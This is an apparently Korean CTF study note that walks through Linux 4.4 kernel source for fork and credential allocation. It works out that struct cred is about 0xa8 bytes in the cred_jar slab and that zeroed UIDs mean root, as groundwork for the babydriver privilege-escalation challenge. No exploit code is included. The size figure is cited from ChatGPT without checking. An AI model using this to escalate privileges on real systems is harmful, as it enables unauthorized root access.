long _do_fork(unsigned long clone_flags,
unsigned long stack_start,
unsigned long stack_size,
int __user *parent_tidptr,
int __user *child_tidptr,
unsigned long tls)
{
struct task_struct *p;
int trace = 0;
long nr;
/*
* Determine whether and which event to report to ptracer. When
* called from kernel_thread or CLONE_UNTRACED is explicitly
* requested, no event is reported; otherwise, report if the event
* for the type of forking is enabled.
*/
if (!(clone_flags & CLONE_UNTRACED)) {
if (clone_flags & CLONE_VFORK)
trace = PTRACE_EVENT_VFORK;
else if ((clone_flags & CSIGNAL) != SIGCHLD)
trace = PTRACE_EVENT_CLONE;
else
trace = PTRACE_EVENT_FORK;
if (likely(!ptrace_event_enabled(current, trace)))
trace = 0;
}
p = copy_process(clone_flags, stack_start, stack_size,
child_tidptr, NULL, trace, tls, NUMA_NO_NODE);
/*
* Do this prior waking up the new thread - the thread pointer
* might get invalid after that point, if the thread exits quickly.
*/
if (!IS_ERR(p)) {
struct completion vfork;
struct pid *pid;
trace_sched_process_fork(current, p);
pid = get_task_pid(p, PIDTYPE_PID);
nr = pid_vnr(pid);
if (clone_flags & CLONE_PARENT_SETTID)
put_user(nr, parent_tidptr);
if (clone_flags & CLONE_VFORK) {
p->vfork_done = &vfork;
init_completion(&vfork);
get_task_struct(p);
}
wake_up_new_task(p);
/* forking complete and child started to run, tell ptracer */
if (unlikely(trace))
ptrace_event_pid(trace, pid);
if (clone_flags & CLONE_VFORK) {
if (!wait_for_vfork_done(p, &vfork))
ptrace_event_pid(PTRACE_EVENT_VFORK_DONE, pid);
}
put_pid(pid);
} else {
nr = PTR_ERR(p);
}
return nr;
}
copy_process를 부른다.
// /kernel/fork.c
// https://elixir.bootlin.com/linux/v4.4.72/source/kernel/fork.c#L1268
static struct task_struct *copy_process(unsigned long clone_flags,
unsigned long stack_start,
unsigned long stack_size,
int __user *child_tidptr,
struct pid *pid,
int trace,
unsigned long tls,
int node)
{
int retval;
struct task_struct *p;
void *cgrp_ss_priv[CGROUP_CANFORK_COUNT] = {};
...
p = dup_task_struct(current, node);
if (!p)
goto fork_out;
ftrace_graph_init_task(p);
rt_mutex_init_task(p);
#ifdef CONFIG_PROVE_LOCKING
DEBUG_LOCKS_WARN_ON(!p->hardirqs_enabled);
DEBUG_LOCKS_WARN_ON(!p->softirqs_enabled);
#endif
retval = -EAGAIN;
if (atomic_read(&p->real_cred->user->processes) >=
task_rlimit(p, RLIMIT_NPROC)) {
if (p->real_cred->user != INIT_USER &&
!capable(CAP_SYS_RESOURCE) && !capable(CAP_SYS_ADMIN))
goto bad_fork_free;
}
current->flags &= ~PF_NPROC_EXCEEDED;
retval = copy_creds(p, clone_flags);
if (retval < 0)
goto bad_fork_free;
...
}
copy_creds를 부른다.
// /kernel/cred.c
// https://elixir.bootlin.com/linux/v4.4.72/source/kernel/cred.c#L322
int copy_creds(struct task_struct *p, unsigned long clone_flags)
{
struct cred *new;
int ret;
if (
#ifdef CONFIG_KEYS
!p->cred->thread_keyring &&
#endif
clone_flags & CLONE_THREAD
) {
p->real_cred = get_cred(p->cred);
get_cred(p->cred);
alter_cred_subscribers(p->cred, 2);
kdebug("share_creds(%p{%d,%d})",
p->cred, atomic_read(&p->cred->usage),
read_cred_subscribers(p->cred));
atomic_inc(&p->cred->user->processes);
return 0;
}
new = prepare_creds();
if (!new)
return -ENOMEM;
if (clone_flags & CLONE_NEWUSER) {
ret = create_user_ns(new);
if (ret < 0)
goto error_put;
}
#ifdef CONFIG_KEYS
/* new threads get their own thread keyrings if their parent already
* had one */
if (new->thread_keyring) {
key_put(new->thread_keyring);
new->thread_keyring = NULL;
if (clone_flags & CLONE_THREAD)
install_thread_keyring_to_cred(new);
}
/* The process keyring is only shared between the threads in a process;
* anything outside of those threads doesn't inherit.
*/
if (!(clone_flags & CLONE_THREAD)) {
key_put(new->process_keyring);
new->process_keyring = NULL;
}
#endif
atomic_inc(&new->user->processes);
p->cred = p->real_cred = get_cred(new);
alter_cred_subscribers(new, 2);
validate_creds(new);
return 0;
error_put:
put_cred(new);
return ret;
}
prepare_creds를 부른다. 다시 보자
// /kernel/crd.c
// https://elixir.bootlin.com/linux/v4.4.72/source/kernel/cred.c#L243
struct cred *prepare_creds(void)
{
struct task_struct *task = current;
const struct cred *old;
struct cred *new;
validate_process_creds();
new = kmem_cache_alloc(cred_jar, GFP_KERNEL);
if (!new)
return NULL;
kdebug("prepare_creds() alloc %p", new);
old = task->cred;
memcpy(new, old, sizeof(struct cred));
atomic_set(&new->usage, 1);
set_cred_subscribers(new, 0);
get_group_info(new->group_info);
get_uid(new->user);
get_user_ns(new->user_ns);
#ifdef CONFIG_KEYS
key_get(new->session_keyring);
key_get(new->process_keyring);
key_get(new->thread_keyring);
key_get(new->request_key_auth);
#endif
#ifdef CONFIG_SECURITY
new->security = NULL;
#endif
if (security_prepare_creds(new, old, GFP_KERNEL) < 0)
goto error;
validate_creds(new);
return new;
error:
abort_creds(new);
return NULL;
}
EXPORT_SYMBOL(prepare_creds);
kmem_cache_alloc으로 할당을 하고 있다.
이는 인자로 캐시핸들을 받는다.
cred_jar을 받는데 이는 전역변수로 creds 모듈이 로드됟 때 아래와 같이 생성된다.
cred_jar를 생성할 때 kmem_cache_create을 이용하는데 size를 cred의 크기만큼 받는다.
// /kernel/cred.c
// https://elixir.bootlin.com/linux/v4.4.72/source/kernel/cred.c#L572
void __init cred_init(void)
{
/* allocate a slab in which we can store credentials */
cred_jar = kmem_cache_create("cred_jar", sizeof(struct cred),
0, SLAB_HWCACHE_ALIGN|SLAB_PANIC, NULL);
}
// /include/linux/cred.h
// https://elixir.bootlin.com/linux/v4.4.72/source/include/linux/cred.h#L118
struct cred {
atomic_t usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
atomic_t subscribers; /* number of processes subscribed */
void *put_addr;
unsigned magic;
#define CRED_MAGIC 0x43736564
#define CRED_MAGIC_DEAD 0x44656144
#endif
kuid_t uid; /* real UID of the task */
kgid_t gid; /* real GID of the task */
kuid_t suid; /* saved UID of the task */
kgid_t sgid; /* saved GID of the task */
kuid_t euid; /* effective UID of the task */
kgid_t egid; /* effective GID of the task */
kuid_t fsuid; /* UID for VFS ops */
kgid_t fsgid; /* GID for VFS ops */
unsigned securebits; /* SUID-less security management */
kernel_cap_t cap_inheritable; /* caps our children can inherit */
kernel_cap_t cap_permitted; /* caps we're permitted */
kernel_cap_t cap_effective; /* caps we can actually use */
kernel_cap_t cap_bset; /* capability bounding set */
kernel_cap_t cap_ambient; /* Ambient capability set */
#ifdef CONFIG_KEYS
unsigned char jit_keyring; /* default keyring to attach requested
* keys to */
struct key __rcu *session_keyring; /* keyring inherited over fork */
struct key *process_keyring; /* keyring private to this process */
struct key *thread_keyring; /* keyring private to this thread */
struct key *request_key_auth; /* assumed request_key authority */
#endif
#ifdef CONFIG_SECURITY
void *security; /* subjective LSM security */
#endif
struct user_struct *user; /* real user ID subscription */
struct user_namespace *user_ns; /* user_ns the caps and keyrings are relative to. */
struct group_info *group_info; /* supplementary groups for euid/fsgid */
struct rcu_head rcu; /* RCU deletion hook */
};
chatgpt한테 물어보니 약 0xa8 바이트라고 한다.
UID랑 GID랑 무슨 차이일까? User ID랑 Group ID 이다. 전부 0이면 root이다.
이렇게 fork할 때 할당되는 creds 크기를 0xa8이라는 것을 알 수 있다.
느낀점
재미있다
참고자료
Writeup: https://mudongliang.github.io/2022/01/18/ciscn2017-babydriver.html
kernel creds: https://ir0nstone.gitbook.io/notes/binexp/kernel/the-ultimate-aim-of-kernel-exploitation-process-credentials